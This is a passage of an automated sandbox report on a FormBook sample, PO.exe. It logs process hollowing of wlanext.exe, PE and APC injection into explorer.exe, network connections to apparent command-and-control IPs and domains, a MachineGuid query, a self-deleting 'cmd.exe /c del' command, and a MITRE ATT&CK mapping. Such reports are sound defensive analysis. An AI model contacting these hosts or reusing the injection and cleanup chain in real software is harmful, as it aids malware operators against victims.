Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D61B8F mov eax, dword ptr fs:[00000030h]	17_2_02D61B8F
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02E0D380 mov ecx, dword ptr fs:[00000030h]	17_2_02E0D380
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02E1138A mov eax, dword ptr fs:[00000030h]	17_2_02E1138A
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D84BAD mov eax, dword ptr fs:[00000030h]	17_2_02D84BAD
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D84BAD mov eax, dword ptr fs:[00000030h]	17_2_02D84BAD
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D84BAD mov eax, dword ptr fs:[00000030h]	17_2_02D84BAD
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D5F358 mov eax, dword ptr fs:[00000030h]	17_2_02D5F358
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D5DB40 mov eax, dword ptr fs:[00000030h]	17_2_02D5DB40
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D83B7A mov eax, dword ptr fs:[00000030h]	17_2_02D83B7A
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D83B7A mov eax, dword ptr fs:[00000030h]	17_2_02D83B7A
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D5DB60 mov ecx, dword ptr fs:[00000030h]	17_2_02D5DB60
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02E28B58 mov eax, dword ptr fs:[00000030h]	17_2_02E28B58
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02E1131B mov eax, dword ptr fs:[00000030h]	17_2_02E1131B
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02DEB8D0 mov eax, dword ptr fs:[00000030h]	17_2_02DEB8D0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02DEB8D0 mov ecx, dword ptr fs:[00000030h]	17_2_02DEB8D0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02DEB8D0 mov eax, dword ptr fs:[00000030h]	17_2_02DEB8D0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02DEB8D0 mov eax, dword ptr fs:[00000030h]	17_2_02DEB8D0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02DEB8D0 mov eax, dword ptr fs:[00000030h]	17_2_02DEB8D0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02DEB8D0 mov eax, dword ptr fs:[00000030h]	17_2_02DEB8D0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D7B8E4 mov eax, dword ptr fs:[00000030h]	17_2_02D7B8E4
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D7B8E4 mov eax, dword ptr fs:[00000030h]	17_2_02D7B8E4
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D540E1 mov eax, dword ptr fs:[00000030h]	17_2_02D540E1
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D540E1 mov eax, dword ptr fs:[00000030h]	17_2_02D540E1
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D540E1 mov eax, dword ptr fs:[00000030h]	17_2_02D540E1
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D558EC mov eax, dword ptr fs:[00000030h]	17_2_02D558EC
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D59080 mov eax, dword ptr fs:[00000030h]	17_2_02D59080
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02DD3884 mov eax, dword ptr fs:[00000030h]	17_2_02DD3884
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02DD3884 mov eax, dword ptr fs:[00000030h]	17_2_02DD3884
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D8F0BF mov ecx, dword ptr fs:[00000030h]	17_2_02D8F0BF
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D8F0BF mov eax, dword ptr fs:[00000030h]	17_2_02D8F0BF
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D8F0BF mov eax, dword ptr fs:[00000030h]	17_2_02D8F0BF
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D990AF mov eax, dword ptr fs:[00000030h]	17_2_02D990AF
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D820A0 mov eax, dword ptr fs:[00000030h]	17_2_02D820A0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D820A0 mov eax, dword ptr fs:[00000030h]	17_2_02D820A0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D820A0 mov eax, dword ptr fs:[00000030h]	17_2_02D820A0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D820A0 mov eax, dword ptr fs:[00000030h]	17_2_02D820A0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D820A0 mov eax, dword ptr fs:[00000030h]	17_2_02D820A0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D820A0 mov eax, dword ptr fs:[00000030h]	17_2_02D820A0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D70050 mov eax, dword ptr fs:[00000030h]	17_2_02D70050
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D70050 mov eax, dword ptr fs:[00000030h]	17_2_02D70050
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02E12073 mov eax, dword ptr fs:[00000030h]	17_2_02E12073
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02E21074 mov eax, dword ptr fs:[00000030h]	17_2_02E21074
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02DD7016 mov eax, dword ptr fs:[00000030h]	17_2_02DD7016
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02DD7016 mov eax, dword ptr fs:[00000030h]	17_2_02DD7016
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02DD7016 mov eax, dword ptr fs:[00000030h]	17_2_02DD7016
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D7A830 mov eax, dword ptr fs:[00000030h]	17_2_02D7A830
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D7A830 mov eax, dword ptr fs:[00000030h]	17_2_02D7A830
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D7A830 mov eax, dword ptr fs:[00000030h]	17_2_02D7A830
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D7A830 mov eax, dword ptr fs:[00000030h]	17_2_02D7A830
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D8002D mov eax, dword ptr fs:[00000030h]	17_2_02D8002D
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D8002D mov eax, dword ptr fs:[00000030h]	17_2_02D8002D
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D8002D mov eax, dword ptr fs:[00000030h]	17_2_02D8002D
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D8002D mov eax, dword ptr fs:[00000030h]	17_2_02D8002D
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D8002D mov eax, dword ptr fs:[00000030h]	17_2_02D8002D
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02E24015 mov eax, dword ptr fs:[00000030h]	17_2_02E24015
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02E24015 mov eax, dword ptr fs:[00000030h]	17_2_02E24015
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D6B02A mov eax, dword ptr fs:[00000030h]	17_2_02D6B02A
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D6B02A mov eax, dword ptr fs:[00000030h]	17_2_02D6B02A
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D6B02A mov eax, dword ptr fs:[00000030h]	17_2_02D6B02A
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D6B02A mov eax, dword ptr fs:[00000030h]	17_2_02D6B02A
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D5B1E1 mov eax, dword ptr fs:[00000030h]	17_2_02D5B1E1
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D5B1E1 mov eax, dword ptr fs:[00000030h]	17_2_02D5B1E1
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D5B1E1 mov eax, dword ptr fs:[00000030h]	17_2_02D5B1E1
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02DE41E8 mov eax, dword ptr fs:[00000030h]	17_2_02DE41E8
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02E149A4 mov eax, dword ptr fs:[00000030h]	17_2_02E149A4
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02E149A4 mov eax, dword ptr fs:[00000030h]	17_2_02E149A4
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02E149A4 mov eax, dword ptr fs:[00000030h]	17_2_02E149A4
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02E149A4 mov eax, dword ptr fs:[00000030h]	17_2_02E149A4
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D82990 mov eax, dword ptr fs:[00000030h]	17_2_02D82990
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D7C182 mov eax, dword ptr fs:[00000030h]	17_2_02D7C182
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D8A185 mov eax, dword ptr fs:[00000030h]	17_2_02D8A185
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02DD51BE mov eax, dword ptr fs:[00000030h]	17_2_02DD51BE
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02DD51BE mov eax, dword ptr fs:[00000030h]	17_2_02DD51BE
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02DD51BE mov eax, dword ptr fs:[00000030h]	17_2_02DD51BE
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02DD51BE mov eax, dword ptr fs:[00000030h]	17_2_02DD51BE
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D799BF mov ecx, dword ptr fs:[00000030h]	17_2_02D799BF
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D799BF mov ecx, dword ptr fs:[00000030h]	17_2_02D799BF
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D799BF mov eax, dword ptr fs:[00000030h]	17_2_02D799BF
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D799BF mov ecx, dword ptr fs:[00000030h]	17_2_02D799BF
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D799BF mov ecx, dword ptr fs:[00000030h]	17_2_02D799BF
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D799BF mov eax, dword ptr fs:[00000030h]	17_2_02D799BF
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D799BF mov ecx, dword ptr fs:[00000030h]	17_2_02D799BF
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D799BF mov ecx, dword ptr fs:[00000030h]	17_2_02D799BF
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D799BF mov eax, dword ptr fs:[00000030h]	17_2_02D799BF
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D799BF mov ecx, dword ptr fs:[00000030h]	17_2_02D799BF
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D799BF mov ecx, dword ptr fs:[00000030h]	17_2_02D799BF
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D799BF mov eax, dword ptr fs:[00000030h]	17_2_02D799BF
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D861A0 mov eax, dword ptr fs:[00000030h]	17_2_02D861A0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D861A0 mov eax, dword ptr fs:[00000030h]	17_2_02D861A0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02DD69A6 mov eax, dword ptr fs:[00000030h]	17_2_02DD69A6
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D7B944 mov eax, dword ptr fs:[00000030h]	17_2_02D7B944
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D7B944 mov eax, dword ptr fs:[00000030h]	17_2_02D7B944
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D5B171 mov eax, dword ptr fs:[00000030h]	17_2_02D5B171
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D5B171 mov eax, dword ptr fs:[00000030h]	17_2_02D5B171
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D5C962 mov eax, dword ptr fs:[00000030h]	17_2_02D5C962
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D59100 mov eax, dword ptr fs:[00000030h]	17_2_02D59100
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D59100 mov eax, dword ptr fs:[00000030h]	17_2_02D59100
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D59100 mov eax, dword ptr fs:[00000030h]	17_2_02D59100
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D8513A mov eax, dword ptr fs:[00000030h]	17_2_02D8513A
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D8513A mov eax, dword ptr fs:[00000030h]	17_2_02D8513A
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D74120 mov eax, dword ptr fs:[00000030h]	17_2_02D74120
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D74120 mov eax, dword ptr fs:[00000030h]	17_2_02D74120
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D74120 mov eax, dword ptr fs:[00000030h]	17_2_02D74120
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D74120 mov eax, dword ptr fs:[00000030h]	17_2_02D74120
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D74120 mov ecx, dword ptr fs:[00000030h]	17_2_02D74120
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D836CC mov eax, dword ptr fs:[00000030h]	17_2_02D836CC
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D98EC7 mov eax, dword ptr fs:[00000030h]	17_2_02D98EC7
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02E0FEC0 mov eax, dword ptr fs:[00000030h]	17_2_02E0FEC0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02E28ED6 mov eax, dword ptr fs:[00000030h]	17_2_02E28ED6
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D676E2 mov eax, dword ptr fs:[00000030h]	17_2_02D676E2
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D816E0 mov ecx, dword ptr fs:[00000030h]	17_2_02D816E0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02E20EA5 mov eax, dword ptr fs:[00000030h]	17_2_02E20EA5
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02E20EA5 mov eax, dword ptr fs:[00000030h]	17_2_02E20EA5
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02E20EA5 mov eax, dword ptr fs:[00000030h]	17_2_02E20EA5
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02DEFE87 mov eax, dword ptr fs:[00000030h]	17_2_02DEFE87
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02DD46A7 mov eax, dword ptr fs:[00000030h]	17_2_02DD46A7
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D67E41 mov eax, dword ptr fs:[00000030h]	17_2_02D67E41
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D67E41 mov eax, dword ptr fs:[00000030h]	17_2_02D67E41
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D67E41 mov eax, dword ptr fs:[00000030h]	17_2_02D67E41
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D67E41 mov eax, dword ptr fs:[00000030h]	17_2_02D67E41
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D67E41 mov eax, dword ptr fs:[00000030h]	17_2_02D67E41
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D67E41 mov eax, dword ptr fs:[00000030h]	17_2_02D67E41
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D7AE73 mov eax, dword ptr fs:[00000030h]	17_2_02D7AE73
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D7AE73 mov eax, dword ptr fs:[00000030h]	17_2_02D7AE73
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D7AE73 mov eax, dword ptr fs:[00000030h]	17_2_02D7AE73
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D7AE73 mov eax, dword ptr fs:[00000030h]	17_2_02D7AE73
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D7AE73 mov eax, dword ptr fs:[00000030h]	17_2_02D7AE73
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02E1AE44 mov eax, dword ptr fs:[00000030h]	17_2_02E1AE44
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02E1AE44 mov eax, dword ptr fs:[00000030h]	17_2_02E1AE44
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D6766D mov eax, dword ptr fs:[00000030h]	17_2_02D6766D
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D8A61C mov eax, dword ptr fs:[00000030h]	17_2_02D8A61C
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D8A61C mov eax, dword ptr fs:[00000030h]	17_2_02D8A61C
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D5C600 mov eax, dword ptr fs:[00000030h]	17_2_02D5C600
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D5C600 mov eax, dword ptr fs:[00000030h]	17_2_02D5C600
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D5C600 mov eax, dword ptr fs:[00000030h]	17_2_02D5C600
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D88E00 mov eax, dword ptr fs:[00000030h]	17_2_02D88E00
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02E0FE3F mov eax, dword ptr fs:[00000030h]	17_2_02E0FE3F
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02E11608 mov eax, dword ptr fs:[00000030h]	17_2_02E11608
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D5E620 mov eax, dword ptr fs:[00000030h]	17_2_02D5E620
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D937F5 mov eax, dword ptr fs:[00000030h]	17_2_02D937F5
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D68794 mov eax, dword ptr fs:[00000030h]	17_2_02D68794

Source: C:\Users\user\Desktop\PO.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\PO.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Network Connect: 172.120.90.239 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.swpszx.com
Source: C:\Windows\explorer.exe	Domain query: www.mitraberdaya.com
Source: C:\Windows\explorer.exe	Network Connect: 5.181.216.112 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 88.198.220.232 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.marienish.com
Source: C:\Windows\explorer.exe	Network Connect: 81.17.18.197 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 35.246.6.109 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.adanahabernet.com
Source: C:\Windows\explorer.exe	Domain query: www.sidepiecebags.com
Source: C:\Windows\explorer.exe	Domain query: www.wwwflixxy.com

Allocates memory in foreign processes

Show sources

Source: C:\Users\user\Desktop\PO.exe

Memory allocated: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 400000 protect: page execute and read and write

Jump to behavior

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\user\Desktop\PO.exe

Memory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 400000 value starts with: 4D5A

Jump to behavior

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Section loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Section loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Thread register set: target process: 3424			Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Thread register set: target process: 3424			Jump to behavior

Queues an APC in another process (thread injection)

Show sources

Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Sample uses process hollowing technique

Show sources

Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe

Section unmapped: C:\Windows\SysWOW64\wlanext.exe base address: 2A0000

Jump to behavior

Writes to foreign memory regions

Show sources

Source: C:\Users\user\Desktop\PO.exe	Memory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\PO.exe	Memory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\PO.exe	Memory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 118B008	Jump to behavior

Source: C:\Users\user\Desktop\PO.exe	Process created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe C:\Users\user\AppData\Local\Temp\AddInProcess32.exe			Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe'			Jump to behavior

Source: explorer.exe, 0000000F.00000000.752969986.0000000000AD8000.00000004.00000020.sdmp	Binary or memory string: ProgmanMD6
Source: explorer.exe, 0000000F.00000000.753350365.0000000001080000.00000002.00000001.sdmp, wlanext.exe, 00000011.00000002.910880399.0000000005390000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 0000000F.00000000.753350365.0000000001080000.00000002.00000001.sdmp, wlanext.exe, 00000011.00000002.910880399.0000000005390000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000000F.00000000.753350365.0000000001080000.00000002.00000001.sdmp, wlanext.exe, 00000011.00000002.910880399.0000000005390000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: explorer.exe, 0000000F.00000000.753350365.0000000001080000.00000002.00000001.sdmp, wlanext.exe, 00000011.00000002.910880399.0000000005390000.00000002.00000001.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 0000000F.00000000.775024682.000000000A716000.00000004.00000001.sdmp	Binary or memory string: Shell_TrayWnd5D

Source: C:\Users\user\Desktop\PO.exe	Queries volume information: C:\Users\user\Desktop\PO.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\PO.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected FormBook

Show sources

Source: Yara match	File source: 0000000B.00000002.792786425.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.793241716.0000000001550000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.760068080.0000000003C10000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.909160222.0000000000330000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.793449385.00000000018D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.759556718.0000000003B47000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.759427914.0000000003AFC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.909733720.0000000002830000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 11.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected FormBook

Show sources

Source: Yara match	File source: 0000000B.00000002.792786425.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.793241716.0000000001550000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.760068080.0000000003C10000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.909160222.0000000000330000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.793449385.00000000018D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.759556718.0000000003B47000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.759427914.0000000003AFC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.909733720.0000000002830000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 11.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts1	Shared Modules1	Valid Accounts1	Valid Accounts1	Masquerading1	OS Credential Dumping	Security Software Discovery121	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Access Token Manipulation1	Valid Accounts1	LSASS Memory	Process Discovery2	Remote Desktop Protocol	Clipboard Data1	Exfiltration Over Bluetooth	Ingress Tool Transfer2	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
